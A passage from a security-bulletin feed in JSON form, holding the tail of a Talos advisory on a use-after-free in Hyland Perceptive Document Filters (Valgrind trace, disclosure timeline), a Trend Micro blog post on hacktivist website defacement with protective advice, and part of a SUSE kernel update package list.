(in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== Address 0x6c69890 is 0 bytes inside a block of size 252 free'd\n ==6702== at 0x402D7B8: operator delete(void*) (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==6702== by 0x8D49BF4: SkCanvas::~SkCanvas() (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSgraphics.so)\n ==6702== by 0x77C4CE5: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7728568: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x77282E3: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x772831C: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x77283BA: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x78C9986: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7759AF6: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7759CDC: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x775F2D0: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7758538: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== Block was alloc'd at\n ==6702== at 0x402C6BC: operator new(unsigned int) (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==6702== by 0x7895965: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x788B5CF: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x78CEBF3: ??? 
(in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x775EF45: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7758538: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x783BE5C: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x67BE594: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreaders.so)\n ==6702== by 0x403CBD9: IGR_Render_Page (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYS11df.so)\n ==6702== by 0x805BBD7: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/isys_doc2text)\n ==6702== by 0x806168F: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/isys_doc2text)\n ==6702== by 0x8068C26: main_doc2text(ISYS_NS::CISYScommander::CResult*, void*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/isys_doc2text)\n ==6702== \n [1] Returned 3 page(s)\n ==6702== \n ==6702== HEAP SUMMARY:\n ==6702== in use at exit: 21,065 bytes in 12 blocks\n ==6702== total heap usage: 64,861 allocs, 64,850 frees, 42,305,231 bytes allocated\n ==6702== \n ==6702== LEAK SUMMARY:\n ==6702== definitely lost: 0 bytes in 0 blocks\n ==6702== indirectly lost: 0 bytes in 0 blocks\n ==6702== possibly lost: 0 bytes in 0 blocks\n ==6702== still reachable: 21,065 bytes in 12 blocks\n ==6702== suppressed: 0 bytes in 0 blocks\n ==6702== Rerun with --leak-check=full to see details of leaked memory\n ==6702== \n ==6702== For counts of detected and suppressed errors, rerun with: -v\n ==6702== ERROR SUMMARY: 3 errors from 3 contexts (suppressed: 0 from 0)\n \n\n### Timeline\n\n2018-02-22 - Vendor Disclosure \n2018-03-22 - Vendor patched \n2018-04-26 - Public Release\n\n##### Credit\n\nDiscovered by Marcin 'Icewall' Noga of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next 
Report\n\nTALOS-2018-0534\n\nPrevious Report\n\nTALOS-2018-0527\n", "edition": 1, "reporter": "Talos Intelligence", "published": "2018-04-26T00:00:00", "title": "Hyland Perceptive Document Filters OpenDocument to JPEG conversion SkCanvas Code Execution vulnerability", "type": "talos", "enchantments": {}, "bulletinFamily": "info", "cvelist": ["CVE-2018-3845"], "modified": "2018-04-26T00:00:00", "id": "TALOS-2018-0528", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0528", "cvss": {"score": 0.0, "vector": "NONE"}}], "trendmicroblog": [{"lastseen": "2018-04-26T16:41:33", "_object_types": ["robots.models.base.Bulletin", "robots.models.rss.RssBulletin"], "references": [], "description": "\n\nActivists have been featured more frequently in the news lately, with marches shining the spotlight on women's rights and bringing about an end to gun violence, to name a few. However, the real world isn't the only place where activism happens.\n\nThe digital realm has become a critical space for individuals to express their opinions and further their causes. While this can revolve around an informational website or video streaming platform, activism has also taken hold in the world of cybercriminals and hackers who have their own beliefs they'd like to communicate and publicize.\n\nEnter hacktivism, activities motivated by political or other ideas spurred by hackers. In many cases, these individuals aren't marching with colorful signs or presenting their ideas as part of civil discourse, but are taking advantage of weaknesses to splash their ideas on an array of different, legitimate websites.\n\n### Local Ohio websites defaced by hacktivists\n\nBefore we delve into the statistics and methods behind these instances, let's take a look at a recent example.\n\nIn 2017, the websites belonging to several local Ohio organizations - including those of Governor John Kasich and his wife Karen Kasich - were hacked and defaced on a Sunday morning. 
According to a report from Cyberscoop, this event was [not an isolated incident](<https://www.cyberscoop.com/ohio-websites-hacked-isis-john-kasich/>), and local government sites in Maryland, Idaho, California and New York had also been defaced by hackers in the past.\n\nThe hacktivists breached the governor's and other local entities' websites, and replaced the original, legitimate content with a threat against the current presidential administration and other violent messages, accompanied by a logo belonging to hacking group Team System DZ.\n\nAs Cyberscoop reported, this instance and many others like it wherein attackers vandalize platforms are considered \"a lower-level form of cyberattack,\" and typically come at the hands of less experienced hackers.\n\nThis group, Team System DZ, took credit for the defacement on the websites themselves as well as on Facebook, and has been vandalizing websites in this way for several years now.\n\nWebsite defacement is a form of digital graffiti.\n\n### How defacement happens\n\nAlthough hacktivist website defacement has been taking place for years now - and has even been featured as part of pop culture story lines in sitcoms and film - until recently there wasn't much research that delved into the targets, methods and motivations behind these activities.\n\nTrend Micro researchers leveraged machine learning and other tactics to gather, examine and analyze more than 13 million instances of web defacements taking place over 18 years across the globe. The insights are compiled in the report, \"[A Deep Dive into Web Defacement: How Geopolitical Events Trigger Web Attacks](<https://documents.trendmicro.com/assets/white_papers/wp-a-deep-dive-into-defacement.pdf>).\"\n\nThe report shows a startling and rising trend toward web defacement, using data from sources including dedicated hacktivist reporting sites Zone-H, Hack-CN, Mirror Zone, Hack Mirror and MyDeface. 
Overall, Trend Micro found more than 104,000 unique defacers, which impacted over 9.929 million individual, compromised domains.\n\n\n\nMost of these events involved defaced websites supported by the Linux operating system, which accounted for more than 9 million defacements. Windows 2003 saw more than 1.5 million defacements, with over 400,000 and 338,000 taking place on Windows 2000 and Windows 2008, respectively. Similarly, Apache servers saw the brunt of attacks, with more than 8 million defacement instances, and more than 1.5 million hacktivist attacks took place on IIS/6.0 web servers.\n\nIn order to breach website protections and carry out defacement, hacktivists will target specific vulnerabilities to glean unauthorized access to backend supporting systems. Trend Micro found that most hacktivists (more than 2 million) leveraged file inclusion vulnerabilities to enable defacement. Other strategies included:\n\n * SQL injections - 1.26 million\n * Unpatched system vulnerabilities - 1.16 million\n * Password stealing - 1.11 million\n * Other types of server intrusions - 800,000\n\n### Motivations driving defacement attacks\n\nThere are numerous different aspects that can motivate hacktivists to deface a website. In many instances, the target is chosen specifically and the defacement tailored to express a certain viewpoint.\n\nTrend Micro's research found that many defacement episodes took place as reactions to other events. Many instances served to push an agenda held by the hacking group, to shine a light on grievances and to spread certain political messages.\n\n**#OpIsrael** \nThis is one of the first, and longest running web defacement campaigns, and one of three major anti-Israel campaigns identified by Trend Micro researchers. #OpIsrael is one example of hacktivist activity motivated by political beliefs and shared grievances. 
To date, several different hacking groups have taken part in #OpIsrael, with defacements driven by the Israel - Palestine conflict.\n\nOne of the first instances of defacements as part of this campaign took place in 2012, when the regular content of myisrael.us was removed and replaced with a political message that included the phrase \"Freedom For Palestine\" alongside an embedded video condemning the Gaza War.\n\nSince then, the campaign has carried out an annual large-scale defacement of various websites on April 7, which coincides with Holocaust Remembrance Day - to date, more than 300 defacers have vandalized over 5,400 domains.\n\nWebsite defacement at the hands of hacktivists has impacted government agencies, private organizations and other entities.\n\n**#OpFrance: Hacktivists respond to Charlie Hebdo attack** \nSeveral hacktivist defacement campaigns also came on the heels of the Charlie Hebdo attack in January 2015, revolving around a controversial French magazine that published satirical cartoons about Islam and the prophet Muhammad.\n\nCampaigns including #OpFrance were established in response to the attack, as well as subcampaigns like #OpCharlie, #OpCharlieHebdo and #AntiCharlieHebdo. Most of the activity that took place in connection with these campaigns happened directly after the attack, reaching a peak on Jan. 11, 2015. However, defacements associated with the Charlie Hebdo attack took place all the way through September 2016.\n\nDigital vandalism was supported by an array of hacking groups from Syria, Morocco, Bangladesh, Indonesia and elsewhere, and centered around French websites that appeared to be sympathetic to the magazine. Defacements included pro-Muslim and pro-Islamic messages.\n\nThese are hardly the only examples of digital vandalism taking place according to hacktivist campaigns. 
[Check out Trend Micro's full report to see additional activity](<https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/web-defacements-exploring-the-methods-of-hacktivists>).\n\n### Safeguarding websites from hacktivist defacement\n\nWhile many defacement events come as responses to specific events, every organization should take the time to ensure that their website is safeguarded against this kind of unauthorized access. Defacement takes a considerable toll, particularly when current and potential customers and partners cannot access the portals, capabilities and information the website typically offers.\n\nHere are a few [security best practices](<https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/web-defacements-exploring-the-methods-of-hacktivists>) to keep in mind:\n\n * **Ensure systems are patched.** Any known vulnerabilities could be used to breach and attack the website. Virtual patching is imperative, and a solution like Trend Micro's [Deep Security](<https://www.trendmicro.com/en_us/business/products/hybrid-cloud/deep-security-data-center.html>) for webserver protection is a beneficial way to manage and maintain patches and updates.\n * **Use strong passwords. 
**Default passwords should be replaced with more robust credentials that include a mix of numbers, letters and special characters and cannot be easily guessed.\n * **Leverage security at the web application level.** This includes web app firewalls to monitor activity and guard against traffic that could threaten website performance and usability.\n\nTo find out more about protecting your organization's website - including with advanced solutions like Trend Micro Deep Security and Vulnerability Protection - [connect with our security experts today](<https://www.trendmicro.com/en_us/business/products/all-solutions.html>).\n\nThe post [Graffiti in the digital world: How hacktivists use defacement](<https://blog.trendmicro.com/graffiti-in-the-digital-world-how-hacktivists-use-defacement/>) appeared first on [](<https://blog.trendmicro.com>).", "reporter": "Trend Micro", "published": "2018-04-25T21:34:24", "type": "trendmicroblog", "title": "Graffiti in the digital world: How hacktivists use defacement", "enchantments": {}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-04-25T21:34:24", "id": "TRENDMICROBLOG:5594DAE038C2DD45B4B4ACBAB46714AC", "href": "https://blog.trendmicro.com/graffiti-in-the-digital-world-how-hacktivists-use-defacement/", "cvss": {"score": 0.0, "vector": "NONE"}}], "suse": [{"lastseen": "2018-04-25T23:36:09", "references": ["https://bugzilla.suse.com/1078669", "https://bugzilla.suse.com/1080813", "https://bugzilla.suse.com/1063516", "https://bugzilla.suse.com/909077", "https://bugzilla.suse.com/1067118", "https://bugzilla.suse.com/1088260", "https://bugzilla.suse.com/1083275", "https://bugzilla.suse.com/1085331", "https://bugzilla.suse.com/1088147", "https://bugzilla.suse.com/1010470", "https://bugzilla.suse.com/1086162", "https://bugzilla.suse.com/1087762", "https://bugzilla.suse.com/1013018", "https://bugzilla.suse.com/1083494", "https://bugzilla.suse.com/1075994", 
"https://bugzilla.suse.com/1078672", "https://bugzilla.suse.com/1075091", "https://bugzilla.suse.com/1087260", "https://bugzilla.suse.com/1085113", "https://bugzilla.suse.com/1083483", "https://bugzilla.suse.com/1067912", "https://bugzilla.suse.com/1039348", "https://bugzilla.suse.com/1085279", "https://bugzilla.suse.com/940776", "https://bugzilla.suse.com/1065600", "https://bugzilla.suse.com/1078674", "https://bugzilla.suse.com/1084536", "https://bugzilla.suse.com/1082091", "https://bugzilla.suse.com/1062568", "https://bugzilla.suse.com/1072689", "https://bugzilla.suse.com/1063416", "https://bugzilla.suse.com/943786", "https://bugzilla.suse.com/1068032", "https://bugzilla.suse.com/1062840", "https://bugzilla.suse.com/1085513", "https://bugzilla.suse.com/1082424", "https://bugzilla.suse.com/1083242", "https://bugzilla.suse.com/1065999", "https://bugzilla.suse.com/1080757", "https://bugzilla.suse.com/1080464", "https://bugzilla.suse.com/1078673", "https://bugzilla.suse.com/1087092", "https://bugzilla.suse.com/1081358", "https://bugzilla.suse.com/1052943", "https://bugzilla.suse.com/1075088", "https://bugzilla.suse.com/1072865", "https://bugzilla.suse.com/1089608"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-source-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-source", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-trace-devel-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-trace-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "s390x", "packageFilename": "kernel-trace-3.0.101-108.38.1.s390x.rpm", "packageName": "kernel-trace", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.0.101-108.38.1", 
"arch": "ia64", "packageFilename": "kernel-default-extra-3.0.101-108.38.1.ia64.rpm", "packageName": "kernel-default-extra", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-bigmem-devel-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-bigmem-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-default-extra-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-default-extra", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-ec2-devel-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-ec2-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-syms-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-syms", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-xen-extra-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-xen-extra", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-trace-base-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-trace-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ia64", "packageFilename": "kernel-default-devel-debuginfo-3.0.101-108.38.1.ia64.rpm", "packageName": "kernel-default-devel-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": 
"kernel-xen-debugsource-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-xen-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "s390x", "packageFilename": "kernel-default-debuginfo-3.0.101-108.38.1.s390x.rpm", "packageName": "kernel-default-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-xen-base-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-xen-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-default-debugsource-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-default-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-bigmem-base-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-bigmem-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-default-debugsource-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-default-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-trace-devel-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-trace-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-default-extra-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-default-extra", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": 
"kernel-trace-debugsource-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-trace-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-pae-debuginfo-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-pae-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-pae-devel-debuginfo-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-pae-devel-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ia64", "packageFilename": "kernel-trace-base-3.0.101-108.38.1.ia64.rpm", "packageName": "kernel-trace-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-xen-devel-debuginfo-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-xen-devel-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-trace-devel-debuginfo-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-trace-devel-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "s390x", "packageFilename": "kernel-syms-3.0.101-108.38.1.s390x.rpm", "packageName": "kernel-syms", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-default-devel-debuginfo-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-default-devel-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ia64", 
"packageFilename": "kernel-default-debugsource-3.0.101-108.38.1.ia64.rpm", "packageName": "kernel-default-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-ppc64-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-bigmem-debugsource-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-bigmem-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-default-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-default", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-xen-extra-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-xen-extra", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ia64", "packageFilename": "kernel-default-base-3.0.101-108.38.1.ia64.rpm", "packageName": "kernel-default-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-ppc64-debuginfo-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-ppc64-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-ec2-debuginfo-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-ec2-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-trace-extra-3.0.101-108.38.1.x86_64.rpm", 
"packageName": "kernel-trace-extra", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-bigmem-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-bigmem", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-trace-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-trace", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-default-devel-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-default-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ia64", "packageFilename": "kernel-syms-3.0.101-108.38.1.ia64.rpm", "packageName": "kernel-syms", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "s390x", "packageFilename": "kernel-trace-devel-3.0.101-108.38.1.s390x.rpm", "packageName": "kernel-trace-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-default-devel-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-default-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-pae-extra-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-pae-extra", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-trace-debugsource-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-trace-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": 
"11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-trace-debuginfo-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-trace-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-trace-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-trace", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-trace-debugsource-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-trace-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "s390x", "packageFilename": "kernel-default-debugsource-3.0.101-108.38.1.s390x.rpm", "packageName": "kernel-default-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-xen-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-xen", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-trace-base-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-trace-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "s390x", "packageFilename": "kernel-trace-base-3.0.101-108.38.1.s390x.rpm", "packageName": "kernel-trace-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-xen-devel-debuginfo-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-xen-devel-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": 
"x86_64", "packageFilename": "kernel-xen-devel-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "s390x", "packageFilename": "kernel-default-devel-3.0.101-108.38.1.s390x.rpm", "packageName": "kernel-default-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "s390x", "packageFilename": "kernel-source-3.0.101-108.38.1.s390x.rpm", "packageName": "kernel-source", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ia64", "packageFilename": "kernel-default-debuginfo-3.0.101-108.38.1.ia64.rpm", "packageName": "kernel-default-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-ec2-debugsource-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-ec2-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "s390x", "packageFilename": "kernel-default-devel-debuginfo-3.0.101-108.38.1.s390x.rpm", "packageName": "kernel-default-devel-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-bigmem-debuginfo-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-bigmem-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-trace-devel-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-trace-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": 
